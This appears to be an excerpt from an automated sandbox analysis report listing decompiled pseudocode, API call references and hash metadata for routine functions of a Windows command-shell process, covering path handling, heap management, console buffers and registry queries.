					} while (_t35 != 0);
					_t62 = _t60 - _t75 >> 1;
					if(_t62 + 3 < 0x7fe7) {
						if(_t62 != 1) {
							_t38 = 0x5c;
							 *((short*)(__ecx + 4 + _t62 * 2)) = _t38;
							 *((short*)(__ecx + 6 + _t62 * 2)) = 0;
						}
						goto L8;
					}
					 *0x1f3cf0 = 3;
					goto L21;
				} else {
					_t63 = _t87;
					_t6 =  &(_t63[1]); // 0x2
					_t76 = _t6;
					do {
						_t40 =  *_t63;
						_t63 =  &(_t63[1]);
					} while (_t40 != 0);
					if(_t63 - _t76 >> 1 == 2) {
						if(_t87[1] != 0x3a) {
							goto L6;
						}
						E001C36CB(0, __ecx, _v8,  *_t87 & 0x0000ffff);
						_t68 = __ecx;
						_t78 = __ecx + 2;
						do {
							_t49 =  *_t68;
							_t68 = _t68 + 2;
						} while (_t49 != 0);
						_t70 = _t68 - _t78 >> 1;
						if(_t70 > 3) {
							_t50 = 0x5c;
							 *((short*)(__ecx + _t70 * 2)) = _t50;
							 *((short*)(__ecx + 2 + _t70 * 2)) = 0;
						}
						L8:
						return _t53;
					}
					L6:
					_t41 = SetErrorMode(_t53);
					SetErrorMode(1);
					_t82 = _v8;
					_v8 = GetFullPathNameW(_a4, _t82, _t80,  &_v12);
					SetErrorMode(_t41);
					_t46 = _v8;
					if(_t46 == 0 || _t46 > _t82) {
						 *0x1f3cf0 = 0xce;
						L21:
						_t53 = 1;
					}
					goto L8;
				}
			}

0x001c2d27
0x001c2d28
0x001c2d2c
0x001c2d2e
0x001c2d31
0x001c2d34
0x001c2d36
0x001c2d38
0x001c2d38
0x001c2d3b
0x001c2d3b
0x001c2d3e
0x001c2d41
0x001c2d48
0x001c2d4a
0x001c2d4f
0x001c2d52
0x001c2d58
0x001c2d63
0x001cd8ed
0x001cd8f2
0x001cd8f5
0x001cd8f8
0x001cd8f8
0x001cd8fb
0x001cd8fe
0x001cd905
0x001cd90f
0x001cd920
0x001cd928
0x001cd929
0x001cd930
0x001cd930
0x00000000
0x001cd920
0x001cd911
0x00000000
0x001c2d69
0x001c2d69
0x001c2d6b
0x001c2d6b
0x001c2d6e
0x001c2d6e
0x001c2d71
0x001c2d74
0x001c2d80
0x001cd93f
0x00000000
0x00000000
0x001cd94e
0x001cd953
0x001cd955
0x001cd958
0x001cd958
0x001cd95b
0x001cd95e
0x001cd965
0x001cd96a
0x001cd972
0x001cd973
0x001cd979
0x001cd979
0x001c2dc7
0x001c2dcf
0x001c2dcf
0x001c2d86
0x001c2d87
0x001c2d91
0x001c2d9f
0x001c2dab
0x001c2dae
0x001c2db4
0x001c2db9
0x001cd983
0x001cd98d
0x001cd98f
0x001cd98f
0x00000000
0x001c2db9

APIs

SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,00000000,?,00000000,00000000,?,?,?,001C3C29,?,00000000,-00000001,00000000,?,00000000), ref: 001C2D87
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,001C3C29,?,00000000,-00000001,00000000,?,00000000), ref: 001C2D91
GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,-00000001,?,00000000,?,001C3C29,?,00000000,-00000001,00000000,?,00000000), ref: 001C2DA4
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,001C3C29,?,00000000,-00000001,00000000,?,00000000), ref: 001C2DAE

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ErrorMode$FullNamePath
String ID:
API String ID: 268959451-0
Opcode ID: 1fd64d4ae8d53a51464467c2cd54627fa58e65f7510124917b0d945ab3d8aa55
Instruction ID: 91670f28ea28b577d753bb1b4e5fb75b2403604e1e4f6fff01799bced38e5f0d
Opcode Fuzzy Hash: 1fd64d4ae8d53a51464467c2cd54627fa58e65f7510124917b0d945ab3d8aa55
Instruction Fuzzy Hash: 86412B39500101ABCB28EFA8C855EBEB379EFA4704B55851DE91787650E771EE81C790

Uniqueness

Uniqueness Score: -1.00%

Function 001BEEF0 Relevance: 6.1, APIs: 4, Instructions: 94
memoryCOMMON

Download Yara Rule

C-Code - Quality: 84%

			E001BEEF0(intOrPtr __ecx, intOrPtr __edx, intOrPtr _a4) {
				void* __ebx;
				intOrPtr _t8;
				signed int _t9;
				intOrPtr _t12;
				void* _t18;
				intOrPtr _t23;
				signed int _t25;
				void* _t32;
				intOrPtr _t33;
				intOrPtr _t34;
				signed int _t35;
				intOrPtr* _t36;

				_t8 =  *0x1f3cd8;
				_t34 = _a4;
				_t23 = __edx;
				_t33 = __ecx;
				 *0x1ef980 = __ecx;
				if(_t8 <= _t34) {
					L4:
					_t35 = 0;
					_t9 = 0;
					_t25 = 0;
					do {
						if(_t9 >= 0 && _t25 < 2) {
							_t18 =  *(0x1dd5b8 + _t35 * 4);
							if(_t18 != 0) {
								VirtualFree(_t18, 0, 0x8000);
								 *(0x1dd5b8 + _t35 * 4) = 0;
							}
						}
						_t35 = _t35 + 1;
						_t9 = _t35;
						_t25 = _t9;
					} while (_t35 < 2);
					 *0x1eb8ac = _t33;
					_push(0);
					_push(0x1eb940);
					 *0x1eb8a8 = _t23;
					 *0x1e3892 = 0;
					 *0x1eb8a4 = 0x1e3892;
					 *0x1eb8a0 = 0x1e3892;
					L001C82C1();
					if(0 != 0) {
						return 0;
					}
					 *0x1dd558 = 0;
					 *0x1dd554 = 0;
					_t36 = E001BDC74(_t23, 0);
					if(_t36 == 0) {
						_t12 = 1;
					} else {
						if(E001BEEC8() != 0 && E001BF030(0) != 0xa &&  *0x1efa90 != 0) {
							E001D82EB(0);
						}
						_t12 = 0;
					}
					 *0x1dd5c8 = _t12;
					if( *0x1efa88 != 0) {
						E001D8121(_t36, 0);
					}
					return _t36;
				}
				while(1) {
					_t32 =  *0x1f3cdc;
					if(_t32 == 0) {
						goto L4;
					}
					 *_t32 = 0;
					 *0x1f3cdc =  *(_t32 + 4);
					 *0x1f3cd8 = _t8 - 1;
					 *(_t32 + 4) = 0;
					RtlFreeHeap(GetProcessHeap(), 0, _t32);
					_t8 =  *0x1f3cd8;
					if(_t8 > _t34) {
						continue;
					}
					goto L4;
				}
				goto L4;
			}

0x001beef5
0x001beefc
0x001beeff
0x001bef02
0x001bef04
0x001bef0c
0x001bef4f
0x001bef4f
0x001bef51
0x001bef53
0x001bef55
0x001bef57
0x001bef5e
0x001bef67
0x001bf00d
0x001bf013
0x001bf013
0x001bef67
0x001bef6d
0x001bef6e
0x001bef70
0x001bef72
0x001bef79
0x001bef7f
0x001bef80
0x001bef85
0x001bef8b
0x001bef91
0x001bef9b
0x001befa5
0x001befaf
0x001beffb
0x001beffb
0x001befb3
0x001befb8
0x001befc2
0x001befc6
0x001beffe
0x001befc8
0x001befcf
0x001cc117
0x001cc117
0x001befe1
0x001befe1
0x001befea
0x001befef
0x001cc125
0x001cc125
0x00000000
0x001beff5
0x001bef10
0x001bef10
0x001bef18
0x00000000
0x00000000
0x001bef1f
0x001bef27
0x001bef2d
0x001bef32
0x001bef40
0x001bef46
0x001bef4d
0x00000000
0x00000000
0x00000000
0x001bef4d
0x00000000

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,00000000,00000000,00000000,?,001BE5F6,?,00000000,00000000,00000000), ref: 001BEF39
RtlFreeHeap.NTDLL(00000000,?,001BE5F6), ref: 001BEF40
_setjmp3.MSVCRT ref: 001BEFA5
VirtualFree.API-MS-WIN-CORE-MEMORY-L1-1-0(00000000,00000000,00008000,00000000,00000000,00000000,?,001BE5F6,?,00000000,00000000,00000000), ref: 001BF00D

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: FreeHeap$ProcessVirtual_setjmp3
String ID:
API String ID: 2613391085-0
Opcode ID: fad7bc7f7fa7051b9531c84f8ce2092c83480043b3830c80455f5d87ab57a826
Instruction ID: a5eac70d187a09b550c5bff19b2ad0f105b492e7c3f539ea38488d5c80319938
Opcode Fuzzy Hash: fad7bc7f7fa7051b9531c84f8ce2092c83480043b3830c80455f5d87ab57a826
Instruction Fuzzy Hash: DF31CE717052519FD714AF79AC89BBA7BE9AB54714F14402EF809CBB60DB70D8C0CB80

Uniqueness

Uniqueness Score: -1.00%

Function 001D579A Relevance: 6.1, APIs: 4, Instructions: 86
COMMON

Download Yara Rule

C-Code - Quality: 51%

			E001D579A(void* __ecx, void* __eflags) {
				char* _v8;
				void* __ebx;
				void* __edi;
				void* __esi;
				void* __ebp;
				void* _t7;
				signed int _t13;
				short _t21;
				char* _t25;
				int _t29;
				short* _t32;
				void* _t35;
				short* _t37;
				short* _t41;
				int _t46;

				_push(__ecx);
				_t7 = E001C7797(__ecx);
				if(_t7 != 0) {
					_t7 =  *0x1fc018(0, 0);
					if(0 != 0) {
						_t28 = 0;
						_t41 = E001C00B0(0);
						if(_t41 == 0) {
							L3:
							E001D9287(_t28);
							__imp__longjmp(0x1eb8b8, 1);
						}
						_t28 = 0;
						_t25 = E001C00B0(0);
						_v8 = _t25;
						if(_t25 == 0) {
							goto L3;
						}
						if(E001C7797(0) != 0) {
							 *0x1fc018(0, _t25);
						}
						_t29 =  *0x1e3854;
						_t13 = E001C0638(_t29);
						asm("sbb eax, eax");
						MultiByteToWideChar(_t29,  ~( ~_t13), _t25, 0xffffffff, _t41, 0);
						_t46 = SetErrorMode(1);
						if( *_t41 != 0) {
							_t35 = 0;
							do {
								E001C33FC(0, _t41, _t35 + _t35, _t41, _t46, _t35 + _t35);
								_t32 = _t41;
								_t3 =  &(_t32[1]); // 0x2
								_t37 = _t3;
								do {
									_t21 =  *_t32;
									_t32 =  &(_t32[1]);
								} while (_t21 != 0);
								_t35 = 1;
								_t41 =  &(( &(_t41[_t32 - _t37 >> 1]))[1]);
							} while ( *_t41 != 0);
							_t25 = _v8;
						}
						SetErrorMode(_t46);
						_t7 = E001C0040(_t25);
					}
				}
				return _t7;
			}

0x001d579f
0x001d57a3
0x001d57aa
0x001d57b4
0x001d57be
0x001d57c4
0x001d57cc
0x001d57d0
0x001d57d2
0x001d57d2
0x001d57de
0x001d57de
0x001d57e4
0x001d57eb
0x001d57ed
0x001d57f2
0x00000000
0x00000000
0x001d57fb
0x001d57ff
0x001d57ff
0x001d5805
0x001d580b
0x001d5816
0x001d581d
0x001d582b
0x001d5832
0x001d5834
0x001d5838
0x001d583c
0x001d5841
0x001d5843
0x001d5843
0x001d5846
0x001d5846
0x001d5849
0x001d584c
0x001d5857
0x001d585b
0x001d585e
0x001d5863
0x001d5863
0x001d5867
0x001d586f
0x001d586f
0x001d57be
0x001d587a

APIs

Part of subcall function 001C00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000), ref: 001C00C1
Part of subcall function 001C00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?), ref: 001C00C8

longjmp.MSVCRT(001EB8B8,00000001,?,?,001C3A4E,?,?,?,?,?,?,?,?), ref: 001D57DE
MultiByteToWideChar.API-MS-WIN-CORE-STRING-L1-1-0(?,00000000,00000000,000000FF,00000000,00000000,?,?,001C3A4E), ref: 001D581D
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000001,?,00000000,00000000,000000FF,00000000,00000000,?,?,001C3A4E), ref: 001D5825
SetErrorMode.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000,?,00000000,00000000,000000FF,00000000,00000000,?,?,001C3A4E), ref: 001D5867

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: ErrorHeapMode$AllocByteCharMultiProcessWidelongjmp
String ID:
API String ID: 162963024-0
Opcode ID: 9d325641d4141274bbb20e791cf466908ae6bccd1c194a837f4a349c6bd00a6b
Instruction ID: 97fe15e417a11fbbaccf42f4fea7bdb042de510e3d9cd4ed3b25e72432f218ca
Opcode Fuzzy Hash: 9d325641d4141274bbb20e791cf466908ae6bccd1c194a837f4a349c6bd00a6b
Instruction Fuzzy Hash: FC210436600A01ABD724BBB58C45EBE775BDFE43507150229BC068B391EF348D46D2A0

Uniqueness

Uniqueness Score: -1.00%

Function 001D29B9 Relevance: 6.1, APIs: 4, Instructions: 85
memoryCOMMON

Download Yara Rule

C-Code - Quality: 100%

			E001D29B9(void* __ecx, void* __eflags, intOrPtr* _a4, intOrPtr _a8) {
				void* _v8;
				intOrPtr _v12;
				intOrPtr _v16;
				intOrPtr _v20;
				intOrPtr* _t39;
				intOrPtr* _t42;
				intOrPtr* _t45;
				void* _t46;
				void* _t47;
				void* _t48;
				intOrPtr* _t54;
				void* _t60;
				long _t69;
				void* _t71;

				_t54 = _a4;
				_t71 = __ecx;
				 *((intOrPtr*)(__ecx + 4)) = _a8;
				 *((intOrPtr*)(__ecx + 8)) =  *((intOrPtr*)(_t54 + 4));
				_t39 = __ecx + 0xc;
				 *_t39 = 0;
				_v12 = _t39;
				 *((short*)(__ecx + 0x10)) =  *((intOrPtr*)(_t54 + 0x20));
				 *((intOrPtr*)(__ecx + 0x14)) =  *_t54;
				_t42 = __ecx + 0x1c;
				 *_t42 = 0;
				_v16 = _t42;
				 *((intOrPtr*)(__ecx + 0x20)) =  *((intOrPtr*)(_t54 + 0x48));
				 *((intOrPtr*)(__ecx + 0x24)) =  *((intOrPtr*)(_t54 + 0x4c));
				_t45 = __ecx + 0x28;
				 *_t45 = 0;
				_v20 = _t45;
				_t46 = E001D28F1( *((intOrPtr*)(_t54 + 0xc)));
				_t47 = E001D28D9( *((intOrPtr*)(_t54 + 0x1c)));
				_t48 = E001D28D9( *((intOrPtr*)(_t54 + 0x44)));
				_t69 = _t46 + _t47 + _t48;
				if( *((intOrPtr*)(__ecx + 0x2c)) == 0 ||  *((intOrPtr*)(__ecx + 0x30)) < _t69) {
					_t48 = HeapAlloc(GetProcessHeap(), 8, _t69);
					_v8 = _t48;
					if(_t48 != 0) {
						RtlFreeHeap(GetProcessHeap(), 0,  *(_t71 + 0x2c));
						_t48 = _v8;
						 *(_t71 + 0x2c) = _t48;
						 *(_t71 + 0x30) = _t69;
					}
				}
				_t60 =  *(_t71 + 0x2c);
				if(_t60 != 0) {
					_t73 = _t60 +  *(_t71 + 0x30);
					_t48 = E001D162E(E001D15C1(E001D15C1(_t60, _t60 +  *(_t71 + 0x30),  *((intOrPtr*)(_t54 + 0x1c)), _v12), _t73,  *((intOrPtr*)(_t54 + 0x44)), _v16), _t73,  *((intOrPtr*)(_t54 + 0xc)), _v20);
				}
				return _t48;
			}

0x001d29c5
0x001d29c9
0x001d29ce
0x001d29d4
0x001d29d7
0x001d29da
0x001d29dc
0x001d29e3
0x001d29e9
0x001d29ec
0x001d29ef
0x001d29f1
0x001d29f7
0x001d29fd
0x001d2a00
0x001d2a03
0x001d2a08
0x001d2a0b
0x001d2a15
0x001d2a1f
0x001d2a24
0x001d2a2a
0x001d2a3b
0x001d2a41
0x001d2a46
0x001d2a54
0x001d2a5a
0x001d2a5d
0x001d2a60
0x001d2a60
0x001d2a46
0x001d2a63
0x001d2a68
0x001d2a70
0x001d2a95
0x001d2a95
0x001d2aa0

APIs

GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,00000000,?,?,?,?,?,?,?,?,?,?,001D1C4B), ref: 001D2A34
HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,?,?,?,?,?,?,?,?,?,001D1C4B), ref: 001D2A3B
GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,00000000,?,?,?,?,?,?,?,?,?,?,001D1C4B), ref: 001D2A4D
RtlFreeHeap.NTDLL(00000000), ref: 001D2A54

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: Heap$Process$AllocFree
String ID:
API String ID: 756756679-0
Opcode ID: 08b41c81765f8f58a351513fba467ddc38b80b0d8eeb177f51a21fb4c8bcb03d
Instruction ID: 0bb2b6a9d81410caf716912c80e422cd2a624a732fd0fd5b74a67b85a785439a
Opcode Fuzzy Hash: 08b41c81765f8f58a351513fba467ddc38b80b0d8eeb177f51a21fb4c8bcb03d
Instruction Fuzzy Hash: 1D310975A00604AFCB25EF69D884A5ABBF5FF58310B0085ABED5AC7711EB70E941CB50

Uniqueness

Uniqueness Score: -1.00%

Function 001C4E94 Relevance: 6.1, APIs: 4, Instructions: 77
COMMON

Download Yara Rule

C-Code - Quality: 67%

			E001C4E94(void*** __ecx, void* __edx, void* __eflags) {
				signed int _v8;
				struct _CONSOLE_SCREEN_BUFFER_INFO _v32;
				void* __ebx;
				void* __edi;
				void* __esi;
				signed int _t13;
				void* _t16;
				signed int _t17;
				void* _t21;
				void* _t22;
				void*** _t27;
				void* _t37;
				void* _t38;
				void** _t39;
				signed int _t40;

				_t37 = __edx;
				_t13 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t13 ^ _t40;
				_t27 = __ecx;
				_t29 = 0x2c;
				_t39 = E001C00B0(_t29);
				if(_t39 == 0) {
					L6:
					_t16 = E001D9287(_t29);
					__imp__longjmp(0x1eb8b8, 1);
					L7:
					__imp___get_osfhandle(1);
					 *_t39 = _t16;
					_t17 = GetConsoleScreenBufferInfo(_t16,  &_v32);
					if(_t17 == 0) {
						 *_t39 =  *_t39 & _t17;
					}
					L2:
					if(GetConsoleScreenBufferInfo( *_t39,  &_v32) != 0) {
						_t38 = 0x2000;
						_t21 = _v32.dwSize + 2;
						if(_t21 >= 0x2000) {
							_t38 = _t21;
						}
					} else {
						_t38 = 0x2002;
					}
					_t29 = _t38 + _t38;
					_t22 = E001C00B0(_t38 + _t38);
					if(_t22 != 0) {
						_t39[4] = _t22;
						_t39[3] = _t38;
						_t39[5] = 0;
						_t39[2] = 0;
						_t39[1] = 0;
						_t39[9] = 0;
						E001C4F29(_t39);
						 *_t27 = _t39;
						return E001C6FD0(0, _t27, _v8 ^ _t40, _t37, _t38, _t39);
					}
					goto L6;
				}
				 *_t39 =  *_t39 & 0x00000000;
				_t16 = E001C0178(_t15);
				if(_t16 != 0) {
					goto L7;
				}
				goto L2;
			}

0x001c4e94
0x001c4e9c
0x001c4ea3
0x001c4eab
0x001c4ead
0x001c4eb3
0x001c4eb7
0x001cf00a
0x001cf00a
0x001cf016
0x001cf01c
0x001cf01e
0x001cf028
0x001cf02c
0x001cf034
0x001cf03a
0x001cf03a
0x001c4ed0
0x001c4ede
0x001cf045
0x001cf04a
0x001cf04f
0x001cf055
0x001cf055
0x001c4ee4
0x001c4ee4
0x001c4ee4
0x001c4ee9
0x001c4eec
0x001c4ef3
0x001c4ef9
0x001c4f00
0x001c4f03
0x001c4f06
0x001c4f09
0x001c4f0c
0x001c4f0f
0x001c4f1a
0x001c4f28
0x001c4f28
0x00000000
0x001c4ef3
0x001c4ebd
0x001c4ec3
0x001c4eca
0x00000000
0x00000000
0x00000000

APIs

Part of subcall function 001C00B0: GetProcessHeap.API-MS-WIN-CORE-HEAP-L1-1-0(00000008,?,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000), ref: 001C00C1
Part of subcall function 001C00B0: HeapAlloc.API-MS-WIN-CORE-HEAP-L1-1-0(00000000,?,001BDF68,00000001,?,00000000,001C3458,-00000105,001DBDD8,00000240,001C4B82,00000000,00000000,001CAE6E,00000000,?), ref: 001C00C8

GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,001C2F2C,-00000001,-00000001,-00000001,-00000001), ref: 001C4ED6
longjmp.MSVCRT(001EB8B8,00000001,?,00000104,00000000,?,?,001C2F2C,-00000001,-00000001,-00000001,-00000001), ref: 001CF016
_get_osfhandle.MSVCRT ref: 001CF01E
GetConsoleScreenBufferInfo.API-MS-WIN-CORE-CONSOLE-L2-1-0(00000000,?,?,001C2F2C,-00000001,-00000001,-00000001,-00000001), ref: 001CF02C

Part of subcall function 001C0178: _get_osfhandle.MSVCRT ref: 001C0183
Part of subcall function 001C0178: GetFileType.API-MS-WIN-CORE-FILE-L1-1-0(00000000,001CD6A1), ref: 001C018D

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: BufferConsoleHeapInfoScreen_get_osfhandle$AllocFileProcessTypelongjmp
String ID:
API String ID: 1629431960-0
Opcode ID: cddf201aa598c994e4117255265653540c18403a0bdac140ccc726d66bedf060
Instruction ID: 5a0a8a6e0a18b52ce9c5b50597681d1c272a19919296548753e929c8150a4651
Opcode Fuzzy Hash: cddf201aa598c994e4117255265653540c18403a0bdac140ccc726d66bedf060
Instruction Fuzzy Hash: 6821BB71A007059FE724AF75E846F7AB7E9EB78B11F11482EF846C6242EB75D801CB81

Uniqueness

Uniqueness Score: -1.00%

Function 001D997C Relevance: 6.1, APIs: 4, Instructions: 75
COMMON

Download Yara Rule

C-Code - Quality: 79%

			E001D997C(WCHAR* __ecx, void* __edi) {
				signed int _v8;
				long _v20;
				char _v24;
				signed int _v28;
				void _v548;
				WCHAR* _v552;
				void* __ebx;
				void* __esi;
				signed int _t24;
				WCHAR* _t37;
				long _t38;
				void* _t39;
				WCHAR* _t40;
				char _t43;
				void* _t51;
				void* _t52;
				WCHAR* _t53;
				signed int _t54;

				_t52 = __edi;
				_t24 =  *0x1dd0b4; // 0xea614d48
				_v8 = _t24 ^ _t54;
				_v552 = _v552 & 0x00000000;
				_v28 = _v28 & 0x00000000;
				_v20 = 0x104;
				_t43 = 1;
				_t53 = __ecx;
				_v24 = 1;
				memset( &_v548, 0, 0x104);
				if(E001C0C70( &_v548, ((0 | _v24 == 0x00000000) - 0x00000001 & 0x0000fdc6) + 0x208) < 0) {
					L10:
					_t43 = 0;
				} else {
					_t37 = _v28;
					if(_t37 == 0) {
						_t37 =  &_v548;
					}
					_t38 = GetFullPathNameW(_t53, _v20, _t37,  &_v552);
					if(_t38 == 0 || _t38 <= 0xffce) {
						goto L10;
					} else {
						_t39 = _v28;
						if(_t39 == 0) {
							_t39 =  &_v548;
						}
						 *((short*)(_t39 + 6)) = 0;
						_t40 = _v28;
						if(_t40 == 0) {
							_t40 =  &_v548;
						}
						if(GetDriveTypeW(_t40) != 4) {
							goto L10;
						}
					}
				}
				__imp__??_V@YAXPAX@Z();
				return E001C6FD0(_t43, _t43, _v8 ^ _t54, _t51, _t52, _t53, _v28);
			}

0x001d997c
0x001d9987
0x001d998e
0x001d9991
0x001d999d
0x001d99a4
0x001d99af
0x001d99b3
0x001d99b5
0x001d99b8
0x001d99e1
0x001d9a39
0x001d9a39
0x001d99e3
0x001d99e3
0x001d99e8
0x001d99ea
0x001d99ea
0x001d99fc
0x001d9a04
0x00000000
0x001d9a0d
0x001d9a0d
0x001d9a12
0x001d9a14
0x001d9a14
0x001d9a1c
0x001d9a20
0x001d9a25
0x001d9a27
0x001d9a27
0x001d9a37
0x00000000
0x00000000
0x001d9a37
0x001d9a04
0x001d9a3e
0x001d9a56

APIs

memset.MSVCRT ref: 001D99B8

Part of subcall function 001C0C70: ??_V@YAXPAX@Z.MSVCRT ref: 001C0CBA
Part of subcall function 001C0C70: memset.MSVCRT ref: 001C0CDD

GetFullPathNameW.API-MS-WIN-CORE-FILE-L1-1-0(004D0043,-00000209,00000000,00000000,-00000209,?,001B2178,00310030), ref: 001D99FC
GetDriveTypeW.API-MS-WIN-CORE-FILE-L1-1-0(00000000,?,001B2178,00310030), ref: 001D9A2E
??_V@YAXPAX@Z.MSVCRT ref: 001D9A3E

Memory Dump Source

Source File: 0000000E.00000002.519238609.00000000001B0000.00000040.80000000.00040000.00000000.sdmp, Offset: 001B0000, based on PE: true

Associated: 0000000E.00000002.519773087.00000000001F9000.00000040.80000000.00040000.00000000.sdmpDownload File
Associated: 0000000E.00000002.519818892.00000000001FD000.00000040.80000000.00040000.00000000.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_14_2_1b0000_cmd.jbxd

Similarity

API ID: memset$DriveFullNamePathType
String ID:
API String ID: 3442494845-0
Opcode ID: e6658a318644b5c7491184e3a6a04b9f9a77cd3b88a021de11924756323a6af7
Instruction ID: 2fe058f9eb5cdba0526b4c19002b192ef1379d2d7ae601bca09b241ebd669bd4
Opcode Fuzzy Hash: e6658a318644b5c7491184e3a6a04b9f9a77cd3b88a021de11924756323a6af7
Instruction Fuzzy Hash: 40212F72A0111AABDB15DFE4EC89BBEB7B8EB14304F0401AAA505E3251EB74DE44CB95

Uniqueness

Uniqueness Score: -1.00%

Function 001D5662 Relevance: 6.1, APIs: 4, Instructions: 75
registryCOMMON

Download Yara Rule

C-Code - Quality: 93%

			E001D5662(void* __ebx, void* __ecx, short* __edx, void* __edi, void* __esi, void* __eflags) {
				long _t21;
				long _t34;
				void* _t44;

				_push(0x1c);
				_push(0x1dc100);
				E001C7678(__ebx, __edi, __esi);
				_t41 = __ecx;
				 *((intOrPtr*)(_t44 - 0x2c)) = __ecx;
				_t43 = 0;
				 *(_t44 - 0x20) = 0;
				 *(_t44 - 0x24) = 0;
				 *(_t44 - 0x1c) = __ecx;
				 *((intOrPtr*)(_t44 - 4)) = 0;
				if(__edx == 0 ||  *__edx == 0) {
					L4:
					_t21 = RegQueryValueExW( *(_t44 - 0x1c), 0, 0, _t44 - 0x28, 0, _t44 - 0x24);
					if(_t21 != 2) {
						if(_t21 != 0) {
							goto L3;
						} else {
							_t43 = E001C00B0( *(_t44 - 0x24));
							 *(_t44 - 0x20) = _t43;
							if(_t43 == 0) {
								SetLastError(8);
								goto L11;
							} else {
								_t34 = RegQueryValueExW( *(_t44 - 0x1c), 0, 0, _t44 - 0x28, _t43, _t44 - 0x24);
								if(_t34 != 0) {
									E001C0040(_t43);
									_t43 = 0;
									 *(_t44 - 0x20) = 0;
									SetLastError(_t34);
									goto L11;
								}
							}
						}
					} else {
						_t43 = E001BDF40(0x1b24ac);
						 *(_t44 - 0x20) = _t30;
					}
				} else {
					_t21 = RegOpenKeyExW(__ecx, __edx, 0, 1, _t44 - 0x1c);
					if(_t21 == 0) {
						goto L4;
					} else {
						L3:
						SetLastError(_t21);
						L11:
					}
				}
				 *((intOrPtr*)(_t44 - 4)) = 0xfffffffe;
				E001D572C(_t41);
				return E001C76BD(_t43);
			}

0x001d5662
0x001d5664
0x001d5669
0x001d566e
0x001d5670
0x001d5675
0x001d5677
0x001d567a
0x001d567d
0x001d5680
0x001d5685
0x001d56a2
0x001d56b0
0x001d56b9
0x001d56ce
0x00000000
0x001d56d0
0x001d56d8
0x001d56da
0x001d56df
0x001d570c
0x00000000
0x001d56e1
0x001d56f5
0x001d56f9
0x001d56fd
0x001d5702
0x001d5704
0x001d570c
0x00000000
0x001d570c
0x001d56f9
0x001d56df
0x001d56bb
0x001d56c5
0x001d56c7
0x001d56c7
0x001d568c
0x001d5695
0x001d569d
0x00000000
0x001d569f
0x001d569f
0x001d570c
0x001d570c
0x001d570c
0x001d569d
0x001d5712
0x001d5719
0x001d5725

APIs

RegOpenKeyExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,?,00000000,00000001,?,001DC100,0000001C,001D4C85), ref: 001D5695
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?,001DC100,0000001C,001D4C85), ref: 001D56B0
RegQueryValueExW.API-MS-WIN-CORE-REGISTRY-L1-1-0(?,00000000,00000000,?,00000000,?), ref: 001D56EF
SetLastError.API-MS-WIN-CORE-ERRORHANDLING-L1-1-0(00000000), ref: 001D570C

Memory Dump Source

